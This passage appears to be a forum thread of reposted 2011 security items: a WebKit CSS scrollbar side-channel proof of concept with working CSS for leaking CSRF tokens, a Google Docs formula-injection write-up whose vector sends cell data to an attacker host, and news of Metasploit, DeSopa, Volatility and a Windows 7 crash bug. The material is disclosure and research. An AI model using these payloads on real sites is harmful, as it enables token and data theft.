font-family: TestR; src: url(test_R.svg#TestR) format("svg"); } @font-face { font-family: TestZ; src: url(test_Z.svg#TestZ) format("svg"); } @font-face { font-family: TestT; src: url(test_T.svg#TestT) format("svg"); } div { border: 1px solid red; height: 20px; overflow-x: none; overflow-y: auto; -webkit-animation-duration: 5s; -webkit-animation-name: decrease; } div a:after { color:white; } div.a a:after { content: attr(href); font-family: TestS; } div.b a:after { content: attr(href); font-family: TestE; } div.c a:after { content: attr(href); font-family: TestZ; } div.d a:after { content: attr(href); font-family: TestT; } div.e a:after { content: attr(href); font-family: TestC; } div.f a:after { content: attr(href); font-family: TestR; } So -- only if a character existing in that font is part of the attribute value, the mapped content will have dimension. If we squeeze the box a bit, we will get a scrollbar. But only if the font-character match is given This is one of those magic "only one char has dimension" fonts I created for the PoC, testing for the letter S: http://html5sec.org/webkit/test_S.svg That "one char only dimension" thing connected with the squeezing means, if we can find out, when the scrollbar appears, we can know which character is part of the attribute value. Now - how can we create a scrollbar, that is able to notify an external resource the second it starts to appear? Well, Webkit has a special feature that allows to fully style scrollbars. We can of course also define a background image for a scrollbar. Too bad is just, that if we do that, the image will be fetched onload. So it's more or less useless. But -- Webkit also supports tons of pseudo classes for scrollbar styles (srsly - tons: http://trac.webkit.org/export/41842/trunk/LayoutTests/scrollbars/overflow-scrollbar-combinations.html - I mean, you know it already I assume . And some of those make sure that background images assigned to the selected elements and states will only be loaded once they actually appear. Bam -- there we have our smart scrollbar of doom. div::-webkit-scrollbar { width: 12px; } div.a::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/S); } div.b::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/E); } div.c::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/Z); } div.d::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/T); } div.e::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/C); } div.f::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/R); } Now if we glue the whole thing together, we simply need the following ingredients: * A CSS injection * Some or two CSRF protected links with a token * One SVG font per character to determine * A server listening for incoming requests The SVG fonts were chosen since they are insanely easy to create. Just set the path and some attributes of any glyph but the desired one to null and done -- we have the perfect font where every character but one is invisible. The animation has to be there because of the aforementioned dimensioning bug - if there's no animation, the background image requests will fire even for those characters tests who don't result in a visible character. @-webkit-keyframes decrease { from { width: 340px; } 50% { width:105px; } 100% { width:340px; } } To fully enjoy the demo, make sure you have a look at the Network tab in the developer tools. You'll see requests for the characters S,E,C,R,T - but none for Z. Z was referenced in the demo with a dedicated test as well. This is our negative test proving that it really works. So - conclusion: We can enumerate characters via CSS -- that is not new since SDC et al. did this with the Sexy Assassin back in 2009 (was it?). With Webkit nevertheless we can do it FAST and without a massive footprint. My suggestion for a fix would be: simply make sure that scrollbars and their numerous components and states cannot request external resources once they appear/change state -- but fetch their stuff onload so we can avoid attacks like these. The only think making this attack work is the fact that some parts of the scrollbar loads data from an external machine on visibility/appearance -- and not on declaration in the style-sheet. Sursa: http://html5sec.org/webkit/test

[h=3]Excel formula injection in Google Docs[/h][h=2]December 21, 2011[/h] Surely all of you know about Google reward program for information security researchers who provide information about weak spots of Google resources. We had the chance to participate in this program, too. Here is a short story from @_chipik and @asintsov. One day we needed to conduct a small survey, and we decided to use Google Docs as platform for the survey. There is an object in Google Docs called Google Forms, and, as obvious from the name, it is used to create various surveys and tests forms. After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey. This is how the form looks for a participant: And this is how the author sees the participant's answers: I suppose that any web researcher upon seeing a form instinctively puts ‘,",> and other interesting symbols here? We tried it, too. However, everything was encoded and filtered exactly as planned. Well… But all of user input is inserted into an Excel table, so why don't we try to inject some formula? Excel formulas start with an “=”. OK, let’s give it a try. Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell. So how do we get rid of the space? Easy as pie: use backspace %08 is the Hex code of the backspace key. Thus, we wrote in the entry field: %08=1+2+C3 Voila! The formula got inserted into the table just fine. All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here. With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell. That gave us the following attack vector: 1) Put sensitive user data into A1 cell (or probably they are already there) 2) Put a formula which makes GET request to http://own_site.com/secret_data_in_base64 into Z666 cell. 3) Read web server logs, get data from cells. 4) Profit! Soon after describing the bug and the possible attack vector we got the following letter: And a bit later we saw our names in Google Hall of Fame Finally, a little Google Hack Posted by DSecRG Sursa: Digital Security Research Group: Excel formula injection in Google Docs

[h=2]Metasploit Tutorial: An introduction to Metasploit Community[/h]Posted by Christian Kirsch on Dec 21, 2011 7:50:48 AM Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product. Scanning Networks with Metasploit Community Basic Exploitation with Metasploit Community Basic Exploitation vs. Smart Exploitation Importing Nexpose Scan Data into Metasploit Using Metasploit Community with Nexpose If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now! Videos: https://community.rapid7.com/community/solutions/metasploit/blog/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community

Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 A developer who calls himself T Rizk doesn't have much faith in Congress making the right decision on anti-piracy legislation, so he's built a work around for the impending censorship measures being considered DeSOPA. The Firefox add-on is stunningly simple as the Stop Online Piracy Act (SOPA) would block specific domain names (e.g. Download music, movies, games, software! The Pirate Bay - The world's most resilient BitTorrent site) of allegedly infringing sites. Firefox, which already boasts an outspoken stance against SOPA, and has already shown they are willing to stand by add-on developers who create circumvention extensions designed to go around measures currently employed by Homeland Security, has welcomed a new add-on, one that is designed to circumvent whatever SOPA website blacklists that are created, provided the bills become law. A new anti-SOPA add-on for Firefox, titled “DeSopa” is such a counter measure.When installed, users can click a single button to resolve a blocked domain via foreign DNS servers, bypassing all domestic DNS blockades and allowing the user to browse the site though the bare IP-address (if supported).“I feel that the general public is not aware of the gravity of SOPA and Congress seems like they are about to cater to the special interests involved, to the detriment of Internet, for which I and many others live and breathe,” DeSopa developer T Rizk told. “It could be that a few members of congress are just not tech savvy and don’t understand that it is technically not going to work, at all. So here’s some proof that I hope will help them err on the side of reason and vote SOPA down,” he adds. If SOPA is implemented, thousands of similar and more innovative programs and services will sprout up to provide access to the websites that people frequent. SOPA is a mistake. It does not even technically help solve the underlying problem, as this software illustrates. What it will do is give undue leverage to predatory organizations, cripple innocent third party websites, severely dampen digital innovation and negatively impact the integrity and security of the Internet. If browsing a site through a single IP address is not supported, this other anti-SOPA plugin provides an alternative. Sursa: Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 | The Hacker News (THN)

Hunting malware with Volatility v2.0 Frank Boldewin CAST Forum December 2011 (English edition) What is Volatility? - Forensics framework to acquire digital artifacts from memory dumps - Completely written in Python - Current stable version is 2.0.1 - Easy to use plugin interface - Supports the following x86 Windows versions - Windows XP SP 2, 3 - Windows 2003 Server SP 0, 1, 2 - Windows Vista SP 0, 1, 2 - Windows 2008 Server SP 1, 2 - Windows 7 SP 0, 1 Download: http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf Sursa: CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing

A simple HTML tag will crash 64-bit Windows 7 0-day leaves kernel in the wrong iframe of mind By John Leyden An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash. The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns. Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure. Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death. The offending script is just an IFRAME tag with an overly large height attribute. Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine. Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7. A video of the Safari-triggered crash along with the HTML PoC can be . Other exploit scenarios might also be possible.Demo: Sursa: A simple HTML tag will crash 64-bit Windows 7 • The Register More info: http://www.pcworld.com/businesscenter/article/246767/new_zeroday_vulnerability_in_windows_7_64bit_may_allow_remote_code_execution.html